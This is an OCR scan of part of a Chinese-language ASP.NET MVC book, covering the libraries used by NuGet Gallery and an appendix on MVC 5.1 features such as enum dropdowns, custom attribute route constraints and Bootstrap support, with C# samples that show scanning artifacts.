同时 运行 在 多 台 服 务 器 上 。 这 样 WebBackgrounder 就 可 以 自动 把 工作 展开 到 多 个 机 器 上 。 为 了 
同步 操作 ， 协 调 器 需要 一 些 中 心 “ 库 ”。 

我 们 决定 使 用 数据 库 ， 因 为 我 们 每 个 场地 (farm) 都 只 有 一 个 数据 库 ， 因 此 它 就 是 中 心 ， 
安装 WebBackgrounder.EntityFramework 包 把 它 连接 起 来 。 

逐渐 地 ， 这些 后 台 进 程 被 移出 了 Web 应 用 程序 , 移入 了 单独 的 Azure Worker。 代 码 仍然 包 
含 在 NuGet Gallery 中 供 其 他 部 署 使 用 hs 
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17.10.2 Lucene.NET 


Install-Package Lucene.NET 


Lucene.NET(http;//nuget.org/packages/Lucene.Net)/é Apache Lucene 搜 索 库 的 开源 部 分 。 它 
是 .NET 最 有 名 的 文本 搜索 引擎 。NuGet Gallery 使 用 它 增强 包 搜索 功能 。 
因为 它 是 Java 库 的 一 部 分 , 对 于 那些 习惯 使 用 NETAPI 的 开发 人 员 , 它 的 API 和 配置 有 点 
笨重 。 但 成 功 配置 后 ， 它 的 功能 非常 强大 ， 而 且 速 度 很 快 。 

如 何 配置 LuceneNET 超 出 了 本 书 的 讨论 范围 。NuGet Gallery 把 LuceneNET 功 能 封装 在 了 
LuceneIndexingService 类 中 。 这 提供 了 一 个 如 何 与 Lucene 相 接 的 范例 。 也 可 以 查看 
LuceneIndexingJob。 这 是 一 个 WebBackgrounder 任 务 ， 每 隔 10 分 钟 会 被 调用 一 次 。 

近来 ， 这 个 用 于 每 个 服务 器 的 LuceneNET 搜 索 功 能 被 一 个 专门 的 搜索 服务 (仍然 运行 在 
Lucene.NET 上 ) 取 代 。 这 个 专门 的 搜索 服务 可 以 维护 一 个 大 得 多 的 索引 , 并 返回 更 加 准确 的 结 
果 。 本 地 Lucene.NET 实 现 仍 然 包含 在 NuGet Gallery 代 码 中 ， 供 网 站 的 其 他 安装 程序 使 用 ， 如 
果 没 有 定义 搜索 服务 URL， 就 会 自动 回 到 使 用 本 地 实例 。 

从 以 下 网 址 可 了 解 NuGet Gallery 的 搜索 服务 的 演进 过 程 : http://blog.nuget.org/ 
20140411/new-search-on-the-gallery.html 。 新 的 搜索 服务 可 在 GitHub 上 获得 : https://github. 
com/NuGet/NuGet.Services.Search. 


17.10.3  AnglicanGeek.MarkdownMailer 


Install-Package AnglicanGeek.MarkdownMailer 


AnglicanGeek.MarkdownMailer(http://nuget.org/packages/AnglicanGeek.MarkdownMailer) 
是 一 个 发 送 邮件 的 简单 库 。 它 的 强大 之 处 在 于 我 们 可 以 使 用 Markdown 语 法 定义 E-mail 内 容 ， 
它 能 够 为 同时 包含 文本 和 HTML 的 视图 生成 一 个 包含 多 个 部 分 的 E-mail。 

NuGet Gallery 使 用 这 一 功能 发 送 所 有 的 通知 e-mail， 比 如 发 给 新 用 户 的 邮件 , 或 者 密码 重 
置 邮件 。MessageService 类 中 包含 NuGet Gallery 使 用 AnglicanGeek.MarkdownMailer 库 的 例子 ， 
可 供 查阅 。 


17.10.4 Ninject 


Install-Package Ninject 


.NET 框 架 有 很 多 依赖 注入 (DD 框架 。NuGet Gallery B] [A 3 f£ Ninject(http://nuget.org/ 
packages/NuGet) 作 为 它 的 依赖 注入 容器 ， 主 要 是 因为 它 干 净 的 API 和 速度 。 

Ninject 是 一 个 核心 库 。NinjectMvc3 包 为 ASPNET MVC 项 目 配置 Ninject。 它 使 得 Ninject 
入 门 变 得 简单 而 容易 。 

正如 前 面 提 到 的 , 所 有 NuGet Gallery 的 Ninject 绑 定 都 在 类 ContainerBindings 中 。 下 面 是 从 
类 ContainerBindings 中 选取 的 两 个 绑 定 示 例 : 


Bind<ISearchService> () .To<LuceneSearchService> ().InRequestScope(); 


Bind«IFormsAuthenticationService»() 
-To«FormsAuthenticationService»() 
-InSingletonScope(); 
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第 一 行 代 码 把 LuceneSearchService 注 册 为 一 个 具体 的 ISearchService 实 例 。 这 样 我 们 就 可 
以 保持 类 的 低 耦 合 。 在 整个 代码 库 中 ， 类 只 引用 ISearchService 接 口 。 这 样 为 单元 测试 过 程 提 
供 模拟 类 就 变 得 非常 简单 。 在 运行 时 ，Ninject 注 入 一 个 具体 实现 。InRequestScope 确 保 为 每 个 
请 求 创 建 一 个 新 实例 。 如 果 类 在 它 的 构造 函数 中 需要 请 求 数据 的 话 ， 这 样 做 是 很 重要 的 。 

第 二 个 绑 定做 同样 的 事情 ， 但 是 InSingletonScope 需 要 确保 在 整个 应 用 程序 中 只 有 一 个 
FormsAuthenticationService 实 例 。 如 果 服 务 需 要 任何 请 求 状态 , 或 者 在 它 的 构造 函数 中 需要 请 
求 状态 ， 请 务必 确保 使 用 请 求 范围 ， 而 不 是 单 例 。 


17.11 小 结 


任何 一 个 项 目 让 两 个 开发 人 员 开 发 时 , 对 如 何 构 建 程序 , 他 们 可 能 会 持 不 同 看 法 。NuGet 
Gallery 也 不 例外 。 甚 至 从 事 NuGet Gallery 开 发 的 每 个 开发 人 员 对 如 何 构建 持 有 的 看 法 都 各 不 
相同 。 

NuGet Gallery 只 是 真实 世界 应 用 程序 出 现 无 限 可 能 性 的 一 个 例子 。 这 里 不 打算 把 它 作为 
一 个 正确 构建 ASPNET MVC 应 用 程序 的 范例 。 

它 唯一 的 目标 是 满足 NuGet Gallery 托 管 NuGet 包 的 需要 。 至 今 为 止 ， 它 的 效果 非常 好 ， 
尽管 有 时 会 出 现 这 样 或 那样 的 问题 。 

然而 ， 笔 者 认为 创建 NuGet Gallery 的 一 个 方面 可 以 普遍 适用 于 每 个 开发 人 员 。NuGet 团 
队 之 所 以 能 够 快速 高 质量 地 创建 NuGet Gallery， 主 要 是 因为 他 们 利用 了 很 多 社区 创建 的 有 用 
软件 包 。 利用 已 有 的 软件 包 能 够 帮助 我 们 快速 高 质量 地 开发 软件 , 因此 , 花费 时 间 浏 览 NuGet 
Gallery 是 值得 的 。 除 了 NuGet Gallery 代 码 中 使 用 的 包 ， 还 有 很 多 非常 优质 的 软件 包 。 

如 果 想 着 手 开发 一 个 真实 世界 的 ASPNET MVC 应 用 程序 , 为 什么 不 考虑 帮助 做 一 些 贡献 
WE? NuGet Gallery 是 一 个 开源 项 目 ，NuGet 团 队 欢 迎 大 家 踊跃 参加 。 查 看 我 们 的 问题 清单 
https://github.com/nuget/nugetgallery/issues， 或 者 加 入 我 们 的 JabbR 聊 天 室 http://jabbr.net/#/rooms/ 
nuget. 


附录 


ASP.NET MVC 5.1 


本 附录 主要 内 容 : 

e ASP.NET MVC 5.1 和 Visual Studio 2013 Update 2 介绍 
e Enum 支 持原 理 

e 如 何 使 用 自 定义 约束 执行 特性 路 由 

è Bootstrap 和 JavaScript 增 强 的 使 用 方法 


附录 A 介绍 了 MVC 5.1 的 一 些 顶 级 功能 ， 以 及 在 MVC 应 用 程序 中 使 用 它们 的 方法 。 


本 附录 及 后 面 的 示例 代码 
本 章 使 用 的 示例 项 目 可 以 从 GitHub 下载， 网址 为 https:/github.conyjongalloway/ 


stardotone 。 其 他 引用 的 示例 代码 在 ASPNET 示 例 资源 库 中 ， 网 址 为 http://aspnet.codeplex. 
com/sourcecontrol/latest#Samples/ReadMe.txt。 


A.1 ASP.NET MVC 5.1 版 本 说 明 


Sh 


月 ， 


ASP.NET MVC 5 和 Visual Studio 2013 在 2013 年 10 月 发 布 。 为 了 尽快 发 布 , ASPNET MVC 
Web API2.1 和 Web Pages 3.1 作 为 对 现 有 项 目 NuGet 包 的 升级 于 2014 年 1 月 发 布 。2014 年 4 
这 些 升级 改进 与 Visual Studio 2013 Update 2 捆绑 在 一 起 。 

在 此 版 本 中 ，MVC 5.1 的 主要 功能 如 下 : 

o 改进 特性 路 由 

针对 编辑 器 模板 的 Bootstrap 支 持 

视图 中 的 枚 举 支持 

MinLength/MaxLength 特 性 的 非 侵 入 式 验 证 

在 非 侵 入 式 Ajax 中 支持 this 上 下 文 

各 种 bug 修 正 
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此 外 ， 此 版 本 还 包括 Web API 2.1， 它 的 主要 功能 如 下 : 
全 局 错误 处 理 
特性 路 由 的 改进 
帮助 页 面 的 改进 
IenoreRoute 支 持 
BSON 媒 体 类 型 格式 化 
更 好 地 支持 异步 过 滤器 
客户 端 格式 化 库 的 查询 解析 

e 各 种 bug 修 正 

本 附录 的 内 容 改编 于 笔者 的 博客 系列 文章 ， 其 中 包括 MVC 5.1 和 Web API 2.1 的 讨论 ， 博 
客 网 址 为 http://aka.ms/mvc51。 本 附录 主要 关注 MVC 5.1， 想 了 解 Web API 2.1 的 更 多 信息 ， 可 
以 查阅 系列 博客 文章 或 发 行 版 本 说 明 。 


A.1.1 获取 MVC 5.1 


获取 MVC 5.1 最 简单 的 方式 就 是 通过 Visual Studio 2013 Update 2 中 的 新 项 目 模板 。 Visual 
Studio 2013 Update 2( 有 些 时 候 简写 为 Visual Studio 2013.2) 包 含 带 有 MVC 5.1 的 更 新 项 目 模 
板 ， 因 此 ， 所 有 的 新 项 目 都 会 包含 本 章 介绍 的 新 特性 。 然 而 ， 之 前 创建 的 项 目 就 需要 升级 ， 
幸运 的 是 ， 升 级 操作 很 简单 ， 只 需要 做 一 下 NuGet 升 级 。 


A.1.2 从 MVC 5.1 升 级 MVC 5 项 目 


这 些 年 来 ， ASPNET 项 目 模板 已 经 更 新 ;现在 它们 大 多 数 都 是 可 组 合 的 NuGet 包 的 集合 。 
我 们 可 以 频繁 地 更 新 这 些 包 ， 并 使 用 它们 ， 而 不 需要 安装 任何 影响 开发 环境 、 影 响 从 事 的 其 
他 项 目 、 影 响 服务 器 环境 和 服务 器 上 其 他 应 用 程序 的 组 件 。 

我 们 不 需要 等 待 托管 服务 提供 商 支 持 ASPNET MVC 5.1、ASPNET Web API 2.1 或 
ASPNET Web Pages 3.1 一 一 如 果 支 持 版 本 5/2/3， 他 们 就 会 支持 版 本 5.1/2.1/3.1。 简 单 来 说 ， 如 
果 服 务 器 支持 ASPNET 4.5， 就 可 以 设置 。 

此 外 ， 也 不 需要 把 Visual Studio 2013 Update 2 升级 到 MVC 5.1， 但 如 果 可 能 的 话 ， 我 们 还 
是 应 该 这 样 做 。 ASPNET MVC 5.1 的 新 功能 需要 我 们 运行 Visual Studio 的 最 新 更 新 来 获取 编辑 
支持 。 当 需要 安装 Visual Studio 更 新 时 ， 这 些 更 新 都 已 经 发 布 ， 所 以 这 就 不 是 问题 ， 不 是 吗 ? 

如 果 没 有 Visual Studio 2013 Update 2， 通 过 下 面 的 方法 可 以 在 Visual Studio 之 前 的 发 布 版 
本 上 获取 MVC 5.1 支 持 : 

e 对 于 Visual Studio 2012， 应 该 安装 ASPNET 和 Web Tools 2013 Update 1( 下 载 网 址 是 
http://go.microsoft.com/fwlink/?LinkId=390062) 。 为 在 Visual Studio 2012 中 获取 
ASP.NET MVC 5 的 支持 ， 我 们 需要 这 样 做 ， 所 以 这 里 并 没有 真正 变化 。 

e 对 于 Visual Studio 2013， 需 要 安装 Visual Studio 2013 Update 1 来 获取 ASPNET MVC 5.1 
Razor 视 图 功能 的 编辑 器 支持 ， 例 如 Bootstrap 过 载 。 


A.1.3 将 MVC 5 应 用 程序 升级 到 MVC 5.1 
本 节 介 绍 通过 安装 新 的 NuGet 包 将 MVC 5 应 用 程序 升级 到 MVC 5.1 的 方法 .本 节 的 示例 使 
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用 Visual Studio 2013 的 Web API 模 板 创建 ， 因 此 ， 如 果 感 兴趣 ， 可 以 使 用 Web API 2.1 的 一 些 
功能 。 


注意 : 本 节 介 绍 的 方法 不 适用 于 Visual Studio 2013 Update 2 创建 的 项 目 。 因 
为 Visual Studio 2013 Update 2 创建 的 项 目 已 经 包含 MVC 5.1 和 Web API2.1， 不 需 
要 任何 NuGet 更 新 。 

如 果 已 经 安装 了 Visual Studio 2013 Update 2， 只 需要 使 用 Web API 模 板 创建 
ASPNET 项 目 , 可 以 直接 学 习 下 一 节 的 内 容 “*ASPNET MVC 视 图 中 的 枚 举 支 持 ”。 


(1) 打开 New Project 对 话 框 ， 然 后 选择 ASPNET Web Application， 再 选择 Web API 模 板 ， 
如 图 A-1 所 示 。 单 击 OK 按钮 。 
a a ap |——— 


Empty WebForms mvc NOST 


— 
5i Si 

Snglpage Facebook 

Antica. 

CE [EGR 

口 wors MIC 34 Web ADI NEZ 
———— 

C) Adv 

—— 


图 A-1 


(2) 选择 Tools | Manage NuGet Packages， 打 开 Manage NuGet Packages 对 话 框 ( 见 图 A-2)， 
检查 包 的 更 新 。 


b installed packages 


Tg Microsoft ASPNET Web Pages 
四 Ths package contains core runtime assemblies shared 
between ASP.NET MVC and ASP.NET Web Pages. 


Mg, Microsoft ASPNET Web API 2.1 Client Libraries 
(Æ The package adt support for formatting and content 
negocition to System Net Hg. 


Pej eis 

Pepot Abuse 

Relesse notes: 

Please vist hetp://go.microsoft com] 

D —— furat Linidd 866 to view the release 

(Æ o package contains the core runtime assembhes tor 
ASPNET Web AP. Tags: Microsoft AspNet Mvc Asper 


Tg Microsoft ASPNET Web API 2.1 Web Host MicroscftAsgNet WebPages (2 310 
[o Ths package contains everything ng pre 
WebAPI on iS. Mcroscft AspNet Razor (2 110 && < 
329 
lutem tere ique TENTED A 
introduces a way to bundle an dependencies subject to odditional lcense 
optimize CSS and JavaSenpt fles. rums 
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(3) 因为 示例 项 目 己 经 废弃 ， 所 以 可 以 单 击 Update All 按 钮 。 如 果 升 级 一 个 真实 的 项 目 ， 
笔者 建议 在 安装 包 之 前 查看 包 的 更 新 。 这 一 点 对 于 JavaScript 库 特别 重要 ， 因 为 jQuery 1.x 升 级 
到 2.x 会 出 现 一 些 不 兼容 。 图 A-3 展 示 了 更 新 应 用 程序 中 所 有 包 的 结果 。 


Uninstalling “Antir 34.1.9004. 
Successfully uninstalled 'Antlr 3419004. 

Updating 'beotstrap' from version 300 to 3.0.3 in project 
"StarDotOr 


Removing 'bootstrap 3.0.0 from StarDotOne. 
Successfully removed 'bootstrap 3.0.0 from StarDotOne. 
Adding 'bcotstrap 3.03' to StarDotOne. 

Successfully added bootstrap 30.3 to StarDotOne.. 
Uninstalling 'bootstrap 300. 

Successfully uninstalled "bootstrap 3.0.0. 

Updating jQuery from version 1102 to '2.0.3" in project 
ere la 


ne 
Removing jQuery 1.10.2 from StarDotOne-. 

Executing script fle "d users jon documents visual studio 2013 
VMrojectsiStarDotOnel packages jQuery.1.10AToolstuninstall gs 
Successfully removed Query 1.1022 from StarDotOne. 

Adding Query 20.3' to StarDotOne. 

Successful added jQuery 203 to StarDotOne. 

Epecuting script file 'd users jon documents visual studio 2013 
Vrojects StarDotOnel packages jQuery 2.0.3 Took install psT'. 
Uninstaling jQuery 1.10.7. 


图 A-3 


A.2 ASP.NET MVC 视 图 中 的 枚 举 支持 


本 节 主 要 介绍 MVC 5.1 对 枚 举 的 支持 。 我 们 创建 一 个 简单 的 模型 类 ， 基 架 了 一 个 视图 ， 
然后 通过 添加 自 定义 的 编辑 器 模板 来 改善 此 视图 。 
(1) 首先 使 用 Salutation 枚 举 创建 一 个 Person 模 型 类 (如 第 4 章 所 述 )。 


using System.ComponentModel .DataAnnotations; 
namespace StarDotOne.Models 
{ 
public class Person 
t 
public int Id ( get; set; } 
public Salutation Salutation ( get; set; } 
public string FirstName ( get; set; } 
public string LastName ( get; set; } 
public int Age ( get; set; } 
} 


//I guess technically these are called honorifics 
public enum Salutation 


t 
[Display(Name = "Mr.")] 


Mr, 

[Display(Name = "Mrs.")] 
Mrs, 

[Display(Name = "Ms.")] 
Ms, 


[Display (Name = "Dr.")] 
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Doctor, 

[Display(Name - "Prof.")] 
Professor, 

Sir, 

Lady, 

Lord 


© 注意 ”一些 Salutation 值 使 用 Display 特 性 为 模型 属性 设置 友好 的 显示 值 ， 如 
果 想 更 详细 地 了 解 ， 请 参阅 第 6 章 的 6.3 节 。 

(2) 删除 HomeController 和 视图 ， 并 使 用 Person 类 基 架 一 个 新 的 HomeController。 运行 应 用 
程序 ， 单 击 Add 链 接 并 浏览 基 架 的 Create 视 图 ， 如 图 A-4 所 示 。 


Create 


Person 


Salutation 


Back to List 


©2014 - My ASP.NET Application 


图 A-4 


© $E Salutation 没 有 下 拉 菜 单 ! 这 只 是 在 开玩笑 。 对 于 使 用 MVC 5 基 架 创 
建 的 项 目 ， 没 有 下 拉 菜 单 在 预料 之 中 。 


(3) 要 获得 下 拉 菜 单 ， 可 以 修改 Salutation 对 应 的 基 架 视图 代码 ， 把 通用 的 HtmlEditorFor 
方法 修改 为 新 的 辅助 方法 Html EnumDropDownListFor。 在 适当 的 时 候 ，Visual Studio 2013 
Update 2 中 包含 的 基 架 模板 会 自动 使 用 Html.EnumDropDownListFor， 因 此 ， 修 改 视图 代码 是 
必需 的 步骤。 

在 Create.cshtml 中 ， 把 下 面 一 行 代码 : 


GHtml.EditorFor (model -»model.Salutation) 
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修改 为 : 
QHtml .EnumDropDownListFor (model -»model.Salutation) 


(4) 现在 刷新 页 面 ， 浏 览 Enum 的 下 拉 菜 单 ， 如 图 A-5 所 示 。 

正如 第 16 章 的 16.6.2 节 “ 自 定义 模板 ”中 介绍 的 ， 可 以 更 新 应 用 程序 ， 以 使 所 有 的 Enum 
类 型 值 都 通过 Editor Templates 和 Display Templates 使 用 Enum 视 图 辅助 方法 来 显示 。 如 果 想 要 
了 解 更 多 ， 可 以 在 CodePlex 上 的 枚 举 样 例 中 找到 示例 ， 网 址 为 https://aspnet.codeplex.com/ 
SourceControl/latest#Samples/ MVC/EnumSample/EnumSample/Views/Shared/。 

(5) 从 上 面 的 枚 举 示例 链接 中 抓 取 EditorTemplates 和 DisplayTemplates 模 板 , 并 把 它们 复制 
到 项 目的 /Views/Shared 目 录 中 ， 如 图 A-6 所 示 。 


a -2am +a 
sont wa D> 


RI Solution 'StarDotOne! (1 project) 
'tarDotOne 


Create 


Person 


Back to List 


3 Global asax 
中 paciages.config 
© 2014 - My ASP.NET Application. D Project. Readme html 


» D Webconfig 


图 A-5 图 A-6 


(6) 改变 Create.cshtml 视 图 ， 返回 到 它 最 初 如 何 使 用 Html.EditorFor 进 行 基 架 。 视图 引擎 为 
对 象 类 型 搜索 匹配 的 EditorTemplate， 发 现 Enum.cshtml， 并 使 用 它 泻 染 所 有 的 枚 举 模型 属性 。 
刷新 Create 视 图 ， 会 看 到 枚 举 都 使 用 下 拉 菜 单 显示 ， 如 图 A-7 所 示 。 


图 A-7 


(7) 上 面 提 到 的 枚 举 示 例 也 包含 一 个 显示 单 选 按 钮 列表 的 EditorTemplate 。 使 用 
Html.EditorFor 的 重 写 功 能 指定 EditorTemplate， 代 码 如 下 : 


GHtml.EditorFor(model -»model.Salutation, templateName: "Enum-radio") 
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现在 所 有 的 枚 举 值 都 用 一 个 单 选 按钮 显示 ， 而 不 再 是 下 拉 菜 单列 表 ， 如 图 A-8 所 示 。 


Salutation — € Mr. O Ms. O Ms. O Dr. OProf. O Sir O Lady O Lord 


FirstName 


图 A-8 


A.3 使 用 自 定义 约束 的 特性 路 由 


自从 第 ] 版 发 布 以 来 ，ASPNET MVC 和 Web API 都 提供 了 简单 和 自 定义 的 路 由 约束 。 下 
是 简单 约束 的 一 个 例子 : 

routes.MapRoute ("blog", "{year}/{month}/{day}", 

new ( controller = "blog", action = "index" }, 
new ( year = @"\d{4}", month = @"\d{2}", day = G"NAd(2)" }); 

上 面 的 约束 例子 会 匹配 “/2014/01/01”， 但 不 会 匹配 “/does/this/work”， 因 为 
“/does/this/work” 不 匹配 上 面 的 模式 。 如 果 简 单 模 式 不 能 满足 更 复杂 的 约束 ， 可 以 使 用 自 定 
义 约束 ， 自 定义 约束 只 需要 实现 RouteConstraint， 并 在 Match 方 法 中 定义 自己 的 逻辑 一 一 如 果 
返回 tue， 说 明 路 由 就 是 匹配 的 。 

public interface IRouteConstraint 
t 


bool Match (HttpContextBase httpContext, Route route, string parameterName, 
RouteValueDictionary values, RouteDirection routeDirection); 


) 
A.3.1 特性 路 由 的 路 由 约束 


ASPNET MVC 5 和 Web API 2 中 一 个 主要 的 新 功能 就 是 添加 了 特性 路 由 。 不 是 在 
/App_StarVRouteConfig.cs 中 使 用 一 系列 routes:MapRoute0 调 用 语句 定义 所 有 路 由 , 而 是 使 用 控 
制 器 操作 和 控制 器 类 上 的 特性 定义 路 由 。 具 体 使 用 传统 路 由 还 是 特性 路 由 ， 由 开发 者 自行 决 
定 ， 可 以 继续 使 用 传统 路 由 ， 也 可 以 使 用 特性 路 由 ， 或 者 两 者 同时 使 用 。 

前 面 特性 路 由 提供 的 自 定义 内 联 约束 ， 如 下 所 示 : 


[Route ("temp/{scale:values (celsius|fahrenheit)}")] 


这 里 ， 范 围 片段 有 自 定义 的 内 联 Values 约 束 ， 它 只 匹配 管道 分 隔 列 表 中 包含 的 范围 值 ， 
也 就 是 说 ， 这 段 代码 会 匹配 /temp/celsius 和 /temp/fahrenheit， 而 不 匹配 /temp/foo。 如 果 想 更 详 
细 地 了 解 ASPNET MVC 5 中 的 特性 路 由 特征 ， 包 括 像 上 面 代码 的 内 联 约 束 ， 可 以 阅读 Ken 
Egozi 的 关于 ASPNET MVC 5 特性 路 由 的 帖子 ， 网 址 是 http://blogs.msdn.com/b/webdev/archive/ 
2013/10/17/attribute-routing-in-asp-net-mvce-5.aspx。 


尽管 内 联 约束 允许 限制 特定 片段 的 值 ， 但 它 有 一 定 的 局 限 性 ， 例 如 不 能 操作 整个 URL， 
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因此 ， 那 些 复杂 的 逻辑 不 可 能 在 内 联 约束 中 实现 。 
现在 我 们 可 以 使 用 ASPNET MVC 5.1 创 建 实现 自 定义 路 由 约束 的 新 特性 。 下 一 节 会 给 
示例 。 


A.3.2 ASP.NET MVC 5.1 示 例 : 添加 自 定义 LocaleRoute 


下 面 是 一 个 简单 的 自 定义 路 由 特性 ， 它 根据 支持 的 语言 环境 列表 实现 匹配 。 
首先 ， 创 建 一 个 实现 了 了 豚 outeConstraint 的 自 定 义 LocaleRouteConstraint: 


public class LocaleRouteConstraint : IRouteConstraint 
{ 
public string Locale { get; private set; } 
public LocaleRouteConstraint (string locale) 
{ 
Locale = locale; 
} 
public bool Match (HttpContextBase httpContext, 
Route route, 
string parameterName, 
RouteValueDictionary values, 
RouteDirection routeDirection) 


object value; 
if (values.TryGetValue("locale", out value) 
&& !string.IsNullOrWhiteSpace (value as string)) 
t 
string locale - value as string; 
if (isValid(locale)) 
t 
return string.Equals( 
Locale, locale, 
StringComparison.OrdinallgnoreCase); 
) 
) 
return false; 
) 
private bool isValid(string locale) 
$ 
string[] validOptions = new[] { "EN-US", "EN-GB", "FR-FR" }; 


return validOptions.Contains(locale. ToUpperInvariant()); 


} 


JRouteConstraint 中 有 一 个 方法 Match, 在 这 个 方法 中 添加 自 定义 逻辑 , 这 些 自 定义 逻辑 决 
定 了 输入 的 路 由 值 、 上 下 文 等 是 否 匹 配 自 定义 路 由 。 如 果 Match 函 数 返回 ttue， 使 用 这 个 约束 
的 路 由 就 会 响应 请 求 ， 如 果 返 回 false， 请 求 就 不 会 映射 到 使 用 该 约束 的 路 由 。 

这 个 示例 有 一 个 简单 的 isValid 匹 配方 法 ， 它 接受 一 个 语言 环境 字符 串 ( 在 本 例 中 是 
“FR-FR”)， 然 后 验证 是 否 在 支持 的 语言 环境 列表 中 。 在 更 高 级 的 应 用 中 ， 这 可 能 要 查询 网 
站 支持 的 语言 环境 的 数据 库 备份 缓存 ， 或 者 使 用 其 他 一 些 更 加 高 级 的 方法 。 如 果 创建 更 加 高 
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m 


级 的 约束 ， 尤 


是 语言 环境 的 约束 ， 笔 者 推荐 阅读 Ben Foster 的 文章 “改善 ASPNET MVC 路 


由 配置 (Improving ASPNET MVC Routing Configuration) ”， 网 址 为 http:/ben.onfabrik comy 
posts/improving-aspnet-mvc-routing-configuration 。 

重要 的 是 ， 相 对 于 简单 模式 匹配 而 言 ， 这 个 例子 中 的 真 值 可 以 运行 更 高 级 的 逻辑 ， 如 果 
只 是 简单 的 模式 匹配 ， 我 们 可 以 使 用 正则 表达 式 的 内 联 路 由 约束 ， 例 如 {x:regex(^\d{3}- 


\d{3}-\d{4}$)} 


， 如 表 9-2 所 示 。 


现在 有 一 个 约束 ， 但 需要 将 它 映射 到 一 个 特性 ， 以 便 在 特性 路 由 中 使 用 。 注 意 ， 从 特性 
中 分 离 约束 具有 很 大 的 灵活 性 。 例 如 ， 可 以 在 多 个 特性 上 使 用 这 个 约束 。 
下 面 是 一 个 简单 的 例子 : 


public class LocaleRouteAttribute : RouteFactoryAttribute 


{ 


public LocaleRouteAttribute (string template, string locale) 


{ 


} 


: base (template) 


Locale - locale; 


public string Locale 


{ 


} 


get; 
private set; 


public override RouteValueDictionary Constraints 


{ 


) 


get 
t 
var constraints - new RouteValueDictionary(); 
constraints.Add("locale", 
new LocaleRouteConstraint (Locale)); 
return constraints; 
) 


public override RouteValueDictionary Defaults 


{ 


t 


get 

t 
var defaults - new RouteValueDictionary(); 
defaults.Add("locale", "en-us"); 
return defaults; 


现在 拥有 一 个 完整 的 路 由 特性 ， 可 以 将 它 放 在 控制 器 或 操作 上 : 


using System.Web.Mvc; 
namespace StarDotOne.Controllers 


t 


[LocaleRoute ("hello/[locale)/[action-Index]", "EN-GB")] 
public class ENGBHomeController : Controller 


t 
// 


GET: /hello/en-gb/ 
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public ActionResult Index() 


t 
return Content("I am the EN-GB controller."); 


H 


} 
下 面 是 FR-FR 控 制 器 : 


using System.Web.Mvc; 
namespace StarDotOne.Controllers 


{ 
[LocaleRoute ("hello/{locale}/{action=Index}", "FR-FR")] 


public class FRFRHomeController : Controller 
t 

// GET: /hello/fr-fr/ 

public ActionResult Index() 


t 
return Content("Je suis le contróleur FR-FR."); 


) 


) 
在 运行 之 前 ， 我 们 需要 确认 已 经 启用 RouteConfig 中 的 特性 路 由 : 


public class RouteConfig 
t 
public static void RegisterRoutes (RouteCollection routes) 
t 
routes.IgnoreRoute ("(resource].axd/(*pathInfo)"); 
routes.MapMvcAttributeRoutes(); 
routes.MapRoute( 
name: "Default", 
url: "(controller]/(action]/(id)", 
defaults: new ( controller - "Home", 
action - "Index", 
id = UrlParameter.Optional } 


i 
现在 ， 如 图 A-9 所 示 ， 对 /hello/en-gb/ 的 请 求 访 问 到 ENGBController， 对 /hello/ft-ft/ 的 请 求 
访问 到 FRFRController。 


€ > E 1 localhost 


dis E Loading.. E) + Adate Delicious 


Je suis le contrôleur FR-FR. 


图 A-9 


因为 将 LocaleRouteAttribute 中 的 默认 语言 环境 设置 成 了 en-us， 所 以 可 以 使 用 /hello/en-us/ 
或 /hello 浏 览 ， 如 图 A-10 所 示 。 
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ds E Loading.. E) + Add to Delicious 


Iam the EN-US controller. 


图 A-10 


如 果 一 直 关 注 ， 可 能 会 觉得 使 用 内 联 路 由 约束 也 可 以 完成 同样 的 工作 。 自 定义 内 联 约束 
的 真正 好 处 体现 在 比 操作 URL 片 段 更 复杂 的 事情 上 ; 例如 , 在 整个 路 由 或 上 下 文中 执行 逻辑 。 
一 个 很 好 的 例子 就 是 使 用 基于 用 户 语言 环境 选择 (可 能 在 cookie 中 设置 ) 的 自 定义 特性 , 或 者 使 
用 头 部 。 
因此 总 结 如 下 : 

e 以 前 , 可 以 使 用 “传统 ”的 基于 编码 的 路 由 编写 自 定义 路 由 约束 , 但 不 在 特性 路 由 中 。 

e 以 前 ， 也 可 以 编写 自 定义 内 联 路 由 约束 ， 但 只 能 映射 到 URL 的 一 个 片段 。 

e 现在 MVC 5.1 可 以 在 高 层次 上 操作 自 定义 路 由 约束 ,而 不 仅仅 是 操作 URL 路 径 上 的 一 

个 片段 ， 例 如， 页 丑 或 其 他 请 求 上 下 文 。 

路 由 头 部 的 常见 应 用 就 是 通过 头 部 进行 版 本 控制 。ASPNET 团 队 已 经 发 布 了 一 个 示例 应 
用 程序 来 演示 如 何 通过 ASPNET Web API 2.1 的 头 部 进行 版 本 管理 ， 网 址 是 http:/aspnet. 
codeplex.com/SourceControl/latest#Samples/WebApi/RoutingConstraintsSample/ReadMe.txt。 

请 记 住 ， 尽 管 一 般 的 建议 都 是 推荐 为 HTTP API 使 用 ASPNET Web API， 但 是 由 于 种 种 原 
因 ， 许 多 API 仍 然 运行 在 ASPNET MVC 上 ， 其 中 包括 现 有 的 / 旧 有 的 系统 API， 这 些 都 建立 在 
ASPNET MVC 之 上 ， 因 为 开发 人 员 熟 悉 MVC， 所 以 大 部 分 现 有 的 MVC 应 用 程序 都 有 少量 
API, 这 些 API 保 持 简 单 , 保持 开发 人 员 偏 好 等 。 因此 , 通过 头 部 版 本 控制 ASPNETMVC HTTP 
API 可 能 也 是 自 定义 路 由 特性 约束 对 于 ASPNET MVC 最 有 用 的 应 用 之 一 。 


A.4 ”Bootstrap 和 JavaScript 增 强 
MVC 5.1 为 Bootstrap 和 Razor 视 图 中 的 JavaScript 提 供 了 一 些小 而 实用 的 增强 。 
A.4.1 ”EditorFor 目 前 支持 HTML 特 性 传递 


除了 没有 样式 的 Empty 模板 之 外 ， 新 的 ASPNET 项 目 模板 都 包含 Bootstrap 主 题 。 
Bootstrap 对 于 任何 事务 都 使 用 自 定 义 类 名 ， 其 中 包括 样式 、 组 件 、 布 局 和 行为 。 令 人 泪 丧 
的 是 ， 不 能 将 类 向 下 传送 给 HTML 辅助 方法 HtmlEditorFor， 只 能 在 默认 的 模板 中 使 用 这 些 
类 。 这 给 我 们 留 下 了 一 些 次 优选 择 : 

e 可 以 使 用 指定 的 HTML 辅 助 方法 ， 比 如 Html.TextBoxFor。 虽 然 这 些 指定 的 辅助 方法 允 
许 我 们 传送 HTMLIL 特 性 ， 但 是 它们 不 能 从 HTML.EditorFor 其 他 一 些 好 的 特征 中 获 益 ， 
例如 针对 显示 和 输入 验证 的 数据 特性 支持 。 
